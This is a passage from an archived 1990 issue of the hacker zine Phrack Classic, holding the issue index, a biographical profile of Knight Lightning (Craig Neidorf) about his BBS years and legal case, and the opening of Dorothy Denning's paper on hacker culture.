home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 32.sit / Phrack Issue 32
Text File  |  1997-02-22  |  337KB  |  7,457 lines

  1. <head>
  2. <title>Phrack Magazine Issue 32, File 1 of 1 </title>
  3. <head>
  4. <body>
  5. <pre>
  6.  
  7.                               ==Phrack Classic==
  8.  
  9.                      Volume Three, Issue 32, File #1 of XX
  10.  
  11.                   Phrack Classic Newsletter Issue XXXII Index
  12.                   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  13.  
  14.                                November 17, 1990
  15.  
  16.   Over the past year we have seen MANY changes in the Phreak/Hack community.
  17. We felt the heat of Operation Sun Devil, watched are friends become public
  18. scapegoats of the 'hacker world', and watched in anger as the lawyers have
  19. tried to smash us and put us out like an old cigarette.  Almost everyday I
  20. hear about someone who just got 'busted' for one reason or another.  This
  21. makes me sit back and think.  If people go to jail for hacking, and hackers
  22. know this, then why does it continue?  Ahhh... an unsolved mystery.  Maybe I
  23. should call Time Life Books.  No, I don't think so.
  24.   Anyways, I am pleased to announce a new era in electronic publications.  A
  25. new age for a new age.  Ladies and gentleman (Trumpet Fanfare Added Here),
  26. Phrack Classic.  Phrack Classic takes off where Phrack left off.  For those
  27. of you who have read Phrack then you might remember me as the editor for a
  28. while.  Well, now I am doing Phrack Classic to try to release a newsletter
  29. that really describes what the Phreak/Hack world is like here in the 1990's.
  30.   People ask me why I am writing a hacker magazine, and they look down on me
  31. for my attempt.  I feel Phrack Classic is written for hackers, yes, but I also
  32. feel that a hacker is one "who enjoys pushing the envelope, bypassing limits,
  33. discovering knowledge, inventing solutions, <and> adventuring into uncharted
  34. areas."  So is it so wrong to publish a newsletter for the exchange of free
  35. information?  No, I don't think so.
  36.   Anyone is welcome to submit an article for Phrack  Classic, and I encourage
  37. everyone to do so.  I hope you enjoy this issue and I look forward to bringing
  38. you many more in the not so distant future.  Stay safe and be free.  See you
  39. at Ho Ho Con!
  40.  
  41.  
  42.                                                     Crimson Death
  43.                                                     Editor of Phrack Classic
  44.  
  45.  
  46. (Quote taken from the Hackers 6.0 Conference Brochure)
  47.  
  48.  
  49. If you have a question, an article submission, or you just wanna say
  50. hello. Send mail to Crimson Death and Doc Holiday at:
  51.  
  52.  
  53.                                  pc@well.uucp
  54. _______________________________________________________________________________
  55.  
  56.  
  57.                               Table of Contents:
  58.  
  59.   1.  Phrack Classic XXXII Index by Crimson Death
  60.   2.  Phrack Classic Spotlight featuring Knight Lightning by Crimson Death
  61.   3.  Concerning Hackers Who Break Into Computer Systems by Dorthy Denning
  62.   4.  The Art of Investigation by Butler
  63.   5.  Unix 'Nasties' by Sir Hackalot
  64.   6.  Automatic Teller Machine Cards by Jester Sluggo
  65.   7.  A Trip to the NCSC by Knight Lightning
  66.   8.  Inside the SYSUAF.DAT File by Pain Hertz
  67.   9.  RSTS by Crimson Death
  68.   10-12.  Knight Line I/Parts 1-3 by Doc Holiday
  69. _______________________________________________________________________________
  70.  
  71.                               ==Phrack Classic==
  72.  
  73.                      Volume Three, Issue 32, File #2 of 12
  74.  
  75.  
  76.                          ==Phrack Classic Spotlight==
  77.  
  78.                                Knight Lightning
  79.                                ~~~~~~~~~~~~~~~~
  80.  
  81. Personal
  82. ~~~~~~~
  83.              Handle:  Knight Lightning
  84.            Call him:  Craig Neidorf
  85.        Past handles:  None
  86.       Handle origin:  Cross between character "Lightning Lad" from DC Comics'
  87.                       Legion of Superheros and Michael Knight from the NBC
  88.                       television series "Knight Rider".
  89.       Date of Birth:  I doubt you're sending me a birthday card so skip it.
  90. Age at current date:  21 years old
  91.              Height:  5'10" or so (give or take an inch)
  92.              Weight:  135-140 lbs.
  93.           Eye color:  Brown
  94.          Hair Color:  Dark Brown
  95.           Computers:  Apple IIc (Do you believe this?)
  96.         Co-Sysop of:  Metal Shop Private, The Brewery, Quick Shop/Metal Shop
  97.                       AE, Whackoland, The Dark Tower, Digital ITS (yay!),
  98.                       Stronghold East and probably a few more I've forgotten
  99.                       about.
  100.         Net address:  C483307@UMCVMB.MISSOURI.EDU (Yes, they actually gave
  101.                       C483307@UMCVMB.BITNET        me my account back!)
  102.                       knight@well.sf.ca.us
  103.  
  104. ------------------------------------------------------------------------------
  105.       For several years I had been a die hard fan of video games, both arcade
  106. and home versions.  It was really the Atari 2600 video game Adventure that led
  107. me into the world of computers and hacking.  As many people might know there
  108. was a secret locked within this game concerning a "magic" dot.  It was not
  109. mentioned in any instruction manuals for the game, but if you could find it and
  110. bring it to the right place in the game, you could enter a room that didn't
  111. officially exist.  In this room was a message flashing in gold and black.  It
  112. said "Created by Warren Robinet".  From that point on I experimented with every
  113. Atari cartridge I had.  I tried screwing around with the connections, the
  114. components on the system itself, and I attempted bizarre tactics within the
  115. games, just to see what might happen.  During that period of time I found
  116. several more secretly implanted messages and developed new ways of playing the
  117. games.  Atari played on this idea quite a bit when they created a four game
  118. saga called Swordquest, but by then the fun was taken out of it because you
  119. knew already that something was waiting to be found.  Eventually I upgraded to
  120. ColecoVision, but before too long this bored me as well.  It is sort of
  121. interesting to see the new surge of home videogames of Nintendo, NEC, and Sega.
  122. It makes me wonder if this cycle is permanent.
  123.      I was first introduced to the world of computers by a friend who had a
  124. Commodore 64.  He showed me what bulletin boards were and then took me on a
  125. tour of the ARPAnet.  Later that year, my long-time and best friend, known to
  126. most of you as Taran King obtained the use of his father's IBM PC.  Together we
  127. explored various bulletin boards in the St. Louis area, always looking for new
  128. places to visit.
  129.      In August of 1983 I received an Apple IIc as a birthday gift from my
  130. parents.  It was real basic -- no monitor (I had a black and white television
  131. for that), no extra disk drive, no printer, no joystick, and no modem.  Those
  132. items I would have to earn.  So instead of playing with faraway computer
  133. systems, I was introduced to programming and a community of people who
  134. considered themselves to be software pirates.  These people seemed to be able
  135. to get software before the companies even began to sell it.  However, I was
  136. content to play games like Ultima III and Wizardry and hack the game itself by
  137. altering character values.  This enabled me to move my characters through
  138. different places, some of which I never might have realized existed.  Later, I
  139. was able to redesign the game itself to create an endless world of new
  140. possibilities for intellectual stimulation.
  141.      Finally in March of 1984, my parents purchased me a modem.  It was a sad
  142. little piece of plastic made by Volksmodem, 300 baud and battery operated, but
  143. it worked and now Knight Lightning was ready to take to the wires.  By this
  144. time I already knew a lot about the bulletin board community through Taran
  145. King.  Even so, it was relatively odd how fast I became co-sysop of the
  146. ancestor to Metal Shop known as The Dark Tower.  TDT was operated by a "hacker"
  147. with the truly unoriginal name of David Lightman.  Before I knew it, I was in
  148. remote command of his system with full power over user validation and BBS
  149. maintenance.  Although the system went down after about six months, it did
  150. attract a few out of state users and it was here that my notoriety began.  It
  151. was almost funny, but even as early as then Taran King, Forest Ranger, and I
  152. became known as the top hacker/phreakers in the St. Louis area.  To this day I
  153. still don't understand why.
  154.      By July of 1985 most of the hacker bulletin boards in St. Louis had
  155. disappeared, but The Dark Tower program lived again when Taran King created
  156. Metal Shop:  The Dark Tower Phase II.  He took the name from a popular
  157. afternoon rock'n roll program (KSHE FM radio) that centered on heavy metal.
  158. Both of us had visited systems around the country and we were able to
  159. effectively advertise MS.  At one point we had over 500 registered users so we
  160. switched to a general password system for security reasons and eventually in
  161. January of 1986 the board became Metal Shop Private and we cut 4/5ths of the
  162. users.
  163.      During the late Spring and early Summer of 1985 Taran King and I created
  164. the 2600 Club.  It was just a group name to stick behind our handles since
  165. everybody was doing it, but it only took use a few months to realize just
  166. how ignorant hacker groups really are.  However, the 2600 Club had one
  167. great legacy -- it gave birth to Phrack.  If you go back and look, you'll
  168. notice that the first issue of Phrack was a product of the 2600 Club.  The idea
  169. for doing Phrack came from Forest Ranger.  Taran King provided the arena and
  170. would be the editor and I came up with the name.
  171.      When I used to call bulletin boards like the Twilight Zone (sysoped by The
  172. Marauder) I would data capture the message bases and save them in text files.
  173. The messages from the hacking subboard would be saved in a file called HACKMESS
  174. (which stood for hack messages), the messages from the phone phreak subboard
  175. were saved as PHREAKMESS, but when there was a subboard where both these types
  176. of messages appeared together, I simply merged the two names and came up with
  177. PHRACKMESS.  Since the newsletter would contain information on both topics and
  178. more, I felt the name Phrack was applicable.  So where did the "Inc." come
  179. from?  Actually it came from another DC Comics series called Infinity Inc.
  180. Kind of silly now since we never intended to actually incorporate.  The first
  181. issue of Phrack was distributed on November 17, 1985.
  182.      In Phrack issue 2 I began the ongoing series of Phrack World News.  I
  183. followed every story I could and it was fun.  The first issue was sort of lame,
  184. but eventually I learned that PWN was the most popular segment of Phrack.  The
  185. greatest thing about PWN was that it was an original concept for a hacker
  186. newsletter -- lots of people had tried to write "how-to files, but no one had
  187. ever tried news before.  Who was getting busted?  What did they do?  How can I
  188. make sure it doesn't happen to me?  Lots of the stories were exaggerated or in
  189. the case of Oryan QUEST, fabricated (by QUEST himself).
  190.      Outside of Phrack World News I wrote files about Videoconferencing,
  191. Private Branch eXchanges, and a few others here and there.  Prior to Phrack
  192. I had released a huge glossary of telecommunications terms and files about the
  193. divestiture of AT&T and its aftermath.  Taran King and I also wrote a joke file
  194. about "Real Phreaks" that was echoed by a continuation of that file in the
  195. Phrack parody issue number 13 that was released on April 1, 1987.
  196.      Throughout my years I have met many people who call themselves hackers
  197. and/or phone phreaks:
  198.  
  199. Android Pope       - I wonder how married life is treating him.
  200. Aristotle          - Sporty!  He is the former editor of the New TAP.
  201. Bad Subscript      - Right hand man to Control C and an expert at disco dancing
  202.                      in high speed Camaros.
  203. Bill from RNOC     - How have your phone bills been?  High?  Have they been!?
  204.                      He is also known as "the most dangerous man in New York."
  205. Beer Wolf          - Former sysop of the (Metal Shop) Brewery.
  206. Blue Buccaneer     - Lost track of him over the years.
  207. Cat Man            - How about a nice Hawaiian Punch?
  208. Cheap Shades       - Now a Computer Science graduate of University of
  209.                      Missouri-Rolla.  Former sysop of Metal Shop AE and
  210.                      QuickShop.
  211. Control C          - A man with serious problems right now.  Hope you get those
  212.                      videotapes and best of luck!
  213. Crimson Death      - The one in 618 NPA.  Very un-original name, but definitely
  214.                      one of a kind.
  215. Cryptic Fist       - Kinda warm for that leather jacket, isn't it? (90 degrees)
  216. Cutthroat          - So what McDonalds do *you* work at?
  217. Dan The Operator   - An informant for John Maxfield (SummerCon '87).
  218. Data Line          - Now a government agent, but hardly a hacker tracker.
  219. David Lightman     - The sysop of The Dark Tower in 314 NPA.
  220. The Dictator       - Not-so secret agent of Gail Thackeray, the assistant
  221.                      Arizona state attorney behind Operation Sun-Devil.
  222.                      In a past life, Dale was the creator of Candid Camera.
  223.                      What a surprise that was this summer.
  224. Disk Jockey        - I thought he was a great guy until he started to backstab
  225.                      me on Lunitic Labs while I was under indictment.
  226. Doc Holiday (901)  - The original!
  227. Dr. Cypher         - Knowledgeable person who remains local.
  228. Dr. Forbin         - Last seen at SummerCon '89.
  229. Dr. Ripco          - Well haven't met him yet, but in a couple of weeks.
  230. Doom Prophet       - A friend who seems to have disappeared.
  231. Epsilon            - Must have lost my number I guess.
  232. Emmanuel Goldstein - Also known as Eric Corley, the editor of 2600 Magazine.
  233. Erik Bloodaxe      - He is a wildcard... totally unpredictable... hacks by the
  234.                      seat of his pants.  Still active, but he'd better not have
  235.                      a squirt gun next to his bed or he may be sorry.{SS}
  236. Forest Ranger      - The man who introduced me to the hacker elite way back
  237.                      when.  Former editor of TeleComputist Newsletter.
  238. Gary Seven         - Don't remember much about him.  Met him with Lex in Fla.
  239. Hatchet Molly      - You know him as Computer Underground Digest's Gordon
  240.                      Meyer.  He used a hacker alias to better enable him to
  241.                      write his famous thesis.
  242. Jester Sluggo      - A mystery man who is still a legend in the Zantigo
  243.                      restroom and a better than average drunk driver.
  244. Kleptic Wizard     - Was he BJ or the Bear?
  245. Lex Luthor         - One time great legend of LOD, now secret BellSouth
  246.                      Security (at least until I hear otherwise).
  247. The Leftist        - I wonder what he was going to say about me at my trial.
  248.                      He gave me a nod the day they dropped the charges against
  249.                      me.  The US Attorney's office tells me that he was going
  250.                      to claim he learned all he knew about hacking from reading
  251.                      Phrack.
  252. Loki               - Lost track of him over the years.
  253. Lucifer 666        - Lights, Camera, Action!
  254. The Mad Hacker     - Sysop of The Private Connection in 219 NPA.
  255. Mad Hatter         - Still don't know what to make of him, but I wonder if he
  256.                      still thinks table salt and baking soda are cocaine.
  257. The Mentor         - Author of GURPS CyberPunk and former sysop of The Phoenix
  258.                      Project bulletin board.
  259. The Noid           - Important enough for Southwestern Bell to question me
  260.                      about him so important enough to be mentioned here.
  261. Par                - Hans.
  262. Phantom Phreaker   - A friend.
  263. Phil Phree         - Sort of spaced out character and right hand man to The
  264.                      Ur-vile.
  265. Phrozen Ghost      - Lost track of him.
  266. Predat0r           - Anarchistic editor of the New TAP.
  267. The Prophet        - Didn't actually "meet" him, but I did see him and hear him
  268.                      speak... as a witness for the prosecution at my trial.  I
  269.                      don't hold a grudge.  His testimony helped clear me.
  270. Rabbit             - Franz.
  271. The Renegade       - Thinks he is part of the Illuminati.
  272. Reverend Enge      - Not that religious.
  273. Sir Francis Drake  - A great guy with an odd taste in jewelry.  The editor of
  274.                      the now defunct WORM.  Duck!
  275. Sir William        - Never did hear the whole story of his problems with the
  276.                      University of Michigan computing staff.
  277. Surfer Bob         - Lost track of him, but he enjoyed a tan at SummerCon'88.
  278. Synthetic Slug     - Surfs up!
  279. Taran King         - My best friend of over 11 years.
  280. TWCB Inc.          - Two brothers who attempted to resurrect TAP, but failed.
  281. Tuc                - Hey!  He's TUC!
  282. The Ur-Vile        - Don't know how I feel about him.  He needs a real handle.
  283.  
  284.      Some of the memorable bulletin boards I was on include:
  285.  
  286. Alliance              - By Phantom Phreaker
  287. Brainstorm Elite      - Where I met Phantom Phreaker and recruited him to Metal
  288.                         Shop Private.
  289. Broadway Show         - By Broadway Hacker.  Changed its name to The Radio
  290.                         Station.
  291. Catch-22              - By Silver Spy.  Only 22 users on this system.
  292. Chamas                - By Terra (Chaos Computer Club) in Germany.
  293. Dark Tower            - By David Lightman 314
  294. Digital ITS           - By Oryan QUEST.  BBS Commands were in Spanish.
  295. DUNE                  - Secret system imbedded on the Dartmouth University
  296.                         mainframe operated remotely by Apollo Phoebus.
  297. Flying Circus         - By Monty Python
  298. FreeWorld II          - By Major Havoc
  299. Hell Phrozen Over     - By the original Crimson Death.  Inspiration for the
  300.                         first Phrack Pro-Phile.
  301. Intergalactic Dismantling, Inc. - By Aiken Drum
  302. Lost City of Atlantis - By The Lineman
  303. Lunatic Labs UnLtd.   - By The Mad Alchemist.  Great system!
  304. Matrix                - By Dr. Stangelove
  305. Metal Shop AE         - By Cheap Shades when he lived in St. Louis, Missouri.
  306. Metal Shop Brewery    - By Beer Wolf who now denies that it ever happened.
  307. Metal Shop Private    - Greatest bulletin board of all time.
  308. MetroMedia            - By Dr. Doom.  System became Danger Zone Private.
  309. NetSys                - By Terminus.  NetSys is now in possession of US Secret
  310.                         Service and Terminus' life is in a shambles.  They set
  311.                         him up and shut him down.  You know him as Len Rose.
  312. Pearly Gates          - First real out of state bulletin board that I called.
  313.                         It had a secret section of the board for all of the
  314.                         really good information.  It was operated by Simon
  315.                         Templar.
  316. Phoenix Project       - By The Mentor.  Great center of learning.
  317. Phreak Klass 2600     - By The Egyptian Lover.  Preceded The Phoenix Project as
  318.                         a great center of learning.
  319. Pipeline              - Another early bbs I visited.
  320. Pirate-80             - A codes board run by Scan Man that has been up for
  321.                         almost 10 years.  This system was NOT a target in
  322.                         Operation Sun-Devil.  Odd?
  323. Private Connection    - By The Mad Hacker
  324. Private Sector        - Legendary system.
  325. QuickShop             - By Cheap Shades when he lived in Rolla, Missouri.
  326. RACS III              - By Tuc
  327. Radio Station         - See The Broadway Show.
  328. Ripco                 - By Dr. Ripco - Shut down in Operation Sun-Devil, but
  329.                         its back up now.
  330. Septic Tank           - By The Safecracker.  Second generation of The Twilight
  331.                         Zone.
  332. ShadowSpawn           - By Psychic Warlord.  Great debate about the use of
  333.                         handles and real name/telephone/etc.  "We're Not
  334.                         *ELITE*, We're Just Cool As Hell!"  Taran King thought
  335.                         they were elite in the negative sense of the word.
  336.                         Great system though.
  337. Speed Demon Elite     - By The Radical Rocker and home base to MetaliBashers,
  338.                         Inc.
  339. Stronghold East Elite - The "real" sysop was Slave Driver, but the board was
  340.                         run from the home of The Equalizer.
  341. Twilight Zone         - By The Marauder.  Great system for knowledge from my
  342.                         early days.
  343. Zyolog                - By Byte Rider in Hawaii.
  344.  
  345.      There are probably a few others that I have forgotten to mention.  My
  346. greatest computer learning experiences came from people like Bill From RNOC,
  347. RNOC, Phantom Phreaker, Forest Ranger, and the authors of the multitude of
  348. Phrack files and other technical journals.
  349.      In general I see computers as the communications medium of the 21st
  350. Century so I devoted a lot of time to mastering their use.  I do not advocate
  351. the illegal breaking in to computer systems, but there are certain types of
  352. information that I feel should be available to everyone equally and not just
  353. the rich or the well connected.
  354.      Through my experiences on the Internet, I have had legitimate access to
  355. IBM VM/CMS, Unix, and VAX/VMS systems.  For the most part I am content with my
  356. VM/CMS account, but will accept invitations from system managers to join their
  357. systems as well.
  358.      With Forest Ranger and Taran King, I organized and attended SummerCon '87,
  359. SummerCon '88, and SummerCon '89.  I did not attend SummerCon '90 since I was
  360. in Chicago at the time.  I helped in organizing and attended PartyCon '87 and
  361. most recently I appeared and spoke at the 13th Annual National Computer
  362. Security Conference in Washington D.C.
  363.      I had been a part of TeleComputist Newsletter, which inadvertently led to
  364. my first real media appearance (Detroit Free Press) and prior to that I was
  365. helping TWCB Inc. to create a NEW TAP.  However, when I learned that they were
  366. just pulling a fraud, I exposed them.  For 5 years I devoted myself to Phrack
  367. with absolutely no compensation save knowledge and experiences gained.
  368.  
  369. ===============================================================================
  370.  
  371.      Interests:  Racquetball (varsity team in high school and a bookshelf full
  372.                  of trophies), Telecommunications, Computers, Music (classic
  373.                  rock and pop music... NO RAP!), Fraternity life (well at least
  374.                  up until the trustees suspended me for being indicted), Women
  375.                  (sexy and smart over just good looks any day), Driving at warp
  376.                  speed on the interstate.
  377.  
  378. Craig's Favorite Things
  379. -----------------------
  380.   Women: I've got it, but don't flaunt it.
  381.    Cars: Ford Mustang, Eagle Talon, Nissan 300 ZX, and Porsche *911* Carrera!
  382.   Foods: No Curry in a hurry-Blecch!  American, Italian, Mexican, and Chinese!
  383.   Music: Genesis, Rush, Yes, Chicago, Eagles, Def Leppard, The Police, Styx...
  384. Leisure: Sleeping, working out, racquetball, writing, computing.
  385. Alcohol: Bacardi, Smirnoff, Jack Daniels, Pat O'Briens, Hard Rock Cafe.
  386.  
  387. Most Memorable Experiences
  388. --------------------------
  389. All of the SummerCons, having an assistant U.S. Attorney lie to my face and
  390. tell me I wasn't in trouble five days after he went to the grand jury to have
  391. me indicted, football game with Sluggo in the Zantigo parking lot, road trip to
  392. Chicago for PartyCon '87, my time in a St. Louis Federal holding facility
  393. after I turned myself over to the U.S. Federal Marshalls (E911 Incident),
  394. Taran King and Cheap Shades out of jail when they were caught trashing,
  395. summer Alliance teleconferences with the PhoneLine Phantoms, the first time I
  396. heard Frank & The Funny Phone Call, watching Control C bother some girl
  397. in the airport and then seeing Erik Bloodaxe fall in love with her.
  398.  
  399.  
  400. Some Other People To Mention
  401. ----------------------------
  402. Sheldon Zenner      - The greatest attorney practicing today.  He turned
  403.                       everything around and saved my future from a legal system
  404.                       gone awry.  Thanks also to Kliebard, Dunlop, Berkowitz,
  405.                       and Kaufman.
  406.  
  407. John Perry Barlow   - Lyricist for the Grateful Dead and amazing writer, John
  408.                       also participated a great deal in generating publicity
  409.                       about my case and helped found the Electronic Frontier
  410.                       Foundation.
  411. Dr. Dorothy Denning - A lady who not only helped with my defense, but invited
  412.                       me to the 13th Annual National Computer Security
  413.                       Conference and is a good friend.
  414. Peter Denning       - Senior editor of the Communications of the ACM and an
  415.                       interesting fellow in his own right.
  416. Scott Ellentuch     - Mentioned earlier as Tuc, Scott is the president of the
  417.                       Telecom Computer Security Group and a close friend.  Tuc
  418.                       assisted the defense team by locating the Bellcore public
  419.                       catalog and the 911 documents found within.  Thanks Tuc!
  420. Terry Gross         - Attorney with Rabinowitz & Boundin in New York City who
  421.                       was hired by the EFF to work on court motions dealing
  422.                       with the First Amendment.
  423. Mike Godwin         - Don't know Mike very well yet, but he was very outspoken
  424.                       in Computer Underground Digest while I was under
  425.                       indictment and now he is in-house counsel to the
  426.                       Electronic Frontier Foundation.
  427. Katie Hafner        - Author of a book coming soon about Pengo, Kevin Mitnick,
  428.                       and Robert Morris, Jr.  I met Katie at the NCSConference.
  429. Steve Jackson       - Founder of Steve Jackson Games.  I haven't yet had the
  430.                       pleasure of meeting Steve, but we may be running into
  431.                       each other in the near future.
  432. Mitch Kapor         - Industry wizard and creator of the Lotus 1-2-3 program,
  433.                       Mitch is a founding member of the Electronic Frontier
  434.                       Foundation that provided legal assistance in my case.  I
  435.                       hope to meet him face-to-face in the near future.
  436. Gordon Meyer        - Gordon has been a tremendous help with Phrack and a
  437.                       friend throughout my entire trial ordeal.
  438. John Nagle          - Inventor who gave technical assistance to my defense team
  439.                       and located some very important public documents.
  440. Marc Rotenberg      - Director of the Computer Professionals For Social
  441.                       Responsibility in Washington D.C.  CPSR is an
  442.                       organization lobbying Congress for reforms in the
  443.                       Computer Fraud & Abuse Act and other legislation.  I hope
  444.                       to be working with him in the future.
  445. Jim Thomas          - Creator and editor of Computer Underground Digest, he
  446.                       brought the details and evidence in my trial to the
  447.                       public eye which helped me gain support.
  448. Steve Wozniak       - Never had any contact with him, but since he had a hand
  449.                       in EFF, I thought I would mention him.  Incidentally I'm
  450.                       ready to upgrade computers if someone has a Macintosh on
  451.                       hand.
  452.  
  453. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  454.  
  455. David Lightman   - The one in 214.  See Oryan QUEST.
  456. Magic Hasan      - Totally freaked out when I contacted him this semester.  It
  457.                    was like he thought I had the plague or something.
  458. Olorin The White - He couldn't seem to understand that I did not want to join
  459.                    his group.
  460. Oryan QUEST      - A hacker who made up news for PWN just to boost his
  461.                    reputation.  Unleash with full force on this!
  462. Sally Ride       - Also known as Space Cadet, SR co-wrote one of the most
  463.                    interesting PWN articles ever printed.
  464. ===============================================================================
  465.  
  466. Private Jokes
  467. ~~~~~~~~~~~~
  468. There are far too many to go through and most of them have been previously
  469. written by Taran King in a Phrack Prophile that appeared in issue 20 of Phrack.
  470. My private jokes shall remain private between those involved or at least until
  471. I publish a book covering the topic.
  472.  
  473. ===============================================================================
  474.  
  475.      Phrack is a part of my life that is now over.  I hope that Phrack Classic
  476. which appears to be a second generation Phrack will learn from its predecessor
  477. and not allow any articles that advocate the illegal entry into computer
  478. systems.  On the other hand, I hope they will continue to bring interesting
  479. information and news to light every issue.
  480.      For the record, I am not the editor of Phrack Classic.  In fact I am not
  481. even a part of their staff.  I would ask that no one send me any articles for
  482. that publication because they will not be forwarded.  I take no responsibility
  483. for the actions taken by Phrack Classic, but I have faith that they shall stay
  484. on the path of honesty and integrity.
  485.      I also have a few words to say about some other issues.  My case and
  486. prosecution had absolutely nothing to do with Operation Sun-Devil, with a
  487. possible exception being the secret video-taping done by the United States
  488. Secret Service at the Ramada Inn-Westport (Maryland Heights, Missouri) during
  489. July 22-24, 1988 (i.e., SummerCon '88).  Operation Sun-Devil was an attempt to
  490. crack down on credit card and calling card abusers and NOT hackers.  Yes, there
  491. are some hackers that abuse these items, but the mere abuse of such does not
  492. make someone a hacker and it is about time that mainstream reporters,
  493. government agents, and prosecutors began to understand the difference.
  494.      I feel that the abuse of "cards" is very immature and should be met with
  495. stern punishment.  I myself have been the victim of credit card fraud and I can
  496. tell you that it is not pleasant to open your bill and see expensive charges
  497. from QVC Home Shopping Network.  For the younger readers, it may take them a
  498. few years to understand this... perhaps when they have credit cards and bills
  499. of their own to deal with.
  500.      As you may guess there is MUCH MORE to my story especially concerning the
  501. last 10 issues of Phrack, the Internet, and the E911 incident, but now is not
  502. the time or the place to tell it.  Sometime in the future I hope to assemble
  503. the tales of all my adventures in the computer underground and publish them in
  504. a real book.
  505.      Finally, Hackers are *NOT* criminals!  Quoting from the brochure for this
  506. year's Hackers Conference in Saratoga, California, a Hacker is "someone who
  507. enjoys pushing the envelope, bypassing limits, discovering knowledge, inventing
  508. solutions, <and> adventuring into uncharted areas."
  509.  
  510. :Craig Neidorf
  511.  
  512. ===============================================================================
  513.  
  514. ...And now for the regularly taken poll from all interviewees.
  515.  
  516.      Of the general population of phreaks you have met, would you consider most
  517. phreaks, if any, to be computer geeks?
  518.  
  519.      "I would not consider most of the hackers or phone phreaks I have met to
  520. be computer geeks, however over the years I have run into people whose goal in
  521. life is to pirate every piece of software in existence and of those people I
  522. feel that a strong percentage are 'geeks'."
  523.  
  524.      Thanks for your time, Craig.  "No problem."
  525.  
  526.                                             Crimson Death
  527. _______________________________________________________________________________
  528.  
  529.                               ==Phrack Classic==
  530.  
  531.                      Volume Three, Issue 32, File #3 of 12
  532.  
  533.               Concerning Hackers Who Break into Computer Systems
  534.  
  535.                               Dorothy E. Denning
  536.                Digital Equipment Corp., Systems Research Center
  537.                    130 Lytton Ave., Palo Alto, CA 94301
  538.                      415-853-2252, denning@src.dec.com
  539.  
  540.  
  541. Abstract
  542.  
  543. A diffuse group of people, often called ``hackers,'' has been
  544. characterized as unethical, irresponsible, and a serious danger to
  545. society for actions related to breaking into computer systems.  This
  546. paper attempts to construct a picture of hackers, their concerns,
  547. and the discourse in which hacking takes place.  My initial findings
  548. suggest that hackers are learners and explorers who want to help
  549. rather than cause damage, and who often have very high standards
  550. of behavior.  My findings also suggest that the discourse surrounding
  551. hacking belongs at the very least to the gray areas between larger
  552. conflicts that we are experiencing at every level of society and
  553. business in an information age where many are not computer literate.
  554. These conflicts are between the idea that information cannot be owned
  555. and the idea that it can, and between law enforcement and the First
  556. and Fourth Amendments.  Hackers have raised serious issues about
  557. values and practices in an information society.  Based on my findings,
  558. I recommend that we work closely with hackers, and suggest several
  559. actions that might be taken.
  560.  
  561.  
  562. 1.  Introduction
  563.  
  564. The world is crisscrossed with many different networks that are used
  565. to deliver essential services and basic necessities -- electric power,
  566. water, fuel, food, goods, to name a few.  These networks are all
  567. publicly accessible and hence vulnerable to attacks, and yet virtually
  568. no attacks or disruptions actually occur.
  569.  
  570. The world of computer networking seems to be an anomaly in the
  571. firmament of networks.  Stories about attacks, breakins, disruptions,
  572. theft of information, modification of files, and the like appear
  573. frequently in the newspapers.  A diffuse group called ``hackers''
  574. is often the target of scorn and blame for these actions.  Why are
  575. computer networks any different from other vulnerable public networks?
  576. Is the difference the result of growing pains in a young field?
  577. Or is it the reflection of deeper tensions in our emerging information
  578. society?
  579.  
  580. There are no easy or immediate answers to these questions.  Yet it
  581. is important to our future in a networked, information-dependent
  582. world that we come to grips with them.  I am deeply interested in
  583. them.  This paper is my report of what I have discovered in the early
  584. stages of what promises to be a longer investigation.  I have
  585. concentrated my attention in these early stages on the hackers
  586. themselves.  Who are they?  What do they say?  What motivates them?
  587. What are their values?  What do that have to say about public policies
  588. regarding information and computers?  What do they have to say about
  589. computer security?
  590.  
  591. >From such a profile I expect to be able to construct a picture of
  592. the discourses in which hacking takes place.  By a discourse I mean
  593. the invisible background of assumptions that transcends individuals
  594. and governs our ways of thinking, speaking, and acting.  My initial
  595. findings lead me to conclude that this discourse belongs at the very
  596. least to the gray areas between larger conflicts that we are
  597. experiencing at every level of society and business, the conflict
  598. between the idea that information cannot be owned and the idea that
  599. it can, and the conflict between law enforcement and the First and
  600. Fourth Amendments.
  601.  
  602. But, enough of the philosophy.  On with the story!
  603.  
  604.  
  605. 2.  Opening Moves
  606.  
  607. In late fall of 1989, Frank Drake (not his real name), editor of
  608. the now defunct cyberpunk magazine W.O.R.M., invited me to be
  609. interviewed for the magazine.  In accepting the invitation, I hoped
  610. that something I might say would discourage hackers from breaking
  611. into systems.  I was also curious about the hacker culture.  This
  612. seemed like a good opportunity to learn about it.
  613.  
  614. The interview was conducted electronically.  I quickly discovered
  615. that I had much more to learn from Drake's questions than to teach.
  616. For example, he asked: ``Is providing computer security for large
  617. databases that collect information on us a real service?  How do
  618. you balance the individual's privacy vs. the corporations?''  This
  619. question surprised me.  Nothing that I had read about hackers ever
  620. suggested that they might care about privacy.  He also asked: ``What
  621. has (the DES) taught us about what the government's (especially NSA's)
  622. role in cryptography should be?''  Again, I was surprised to discover
  623. a concern for the role of the government in computer security.  I
  624. did not know at the time that I would later discover considerable
  625. overlap in the issues discussed by hackers and those of other computer
  626. professionals.
  627.  
  628. I met with Drake to discuss his questions and views.  After our
  629. meeting, we continued our dialog electronically with me interviewing
  630. him.  This gave me the opportunity to explore his views in greater
  631. depth.  Both interviews appear in ``Computers Under Attack,''
  632. edited by Peter Denning (DenningP90).
  633.  
  634. My dialog with Drake increased my curiosity about hackers.  I read
  635. articles and books by or about hackers.  In addition, I had discussions
  636. with nine hackers whom I will not mention by name.  Their ages ranged
  637. from 17 to 28.
  638.  
  639. The word ``hacker'' has taken on many different meanings ranging
  640. from 1) ``a person who enjoys learning the details of computer systems
  641. and how to stretch their capabilities'' to 2) ``a malicious or
  642. inquisitive meddler who tries to discover information by poking around
  643. ... possibly by deceptive or illegal means ...'' (Steele83).  The
  644. hackers described in this paper are both learners and explorers who
  645. sometimes perform illegal actions.  However, all of the hackers I
  646. spoke with said they did not engage in or approve of malicious acts
  647. that damage systems or files.  Thus, this paper is not about malicious
  648. hackers.  Indeed, my research so far suggests that there are very
  649. few malicious hackers.   Neither is this paper about career criminals
  650. who, for example, defraud businesses, or about people who use stolen
  651. credit cards to purchase goods.  The characteristics of many of the
  652. hackers I am writing about are summed up in the words of one of the
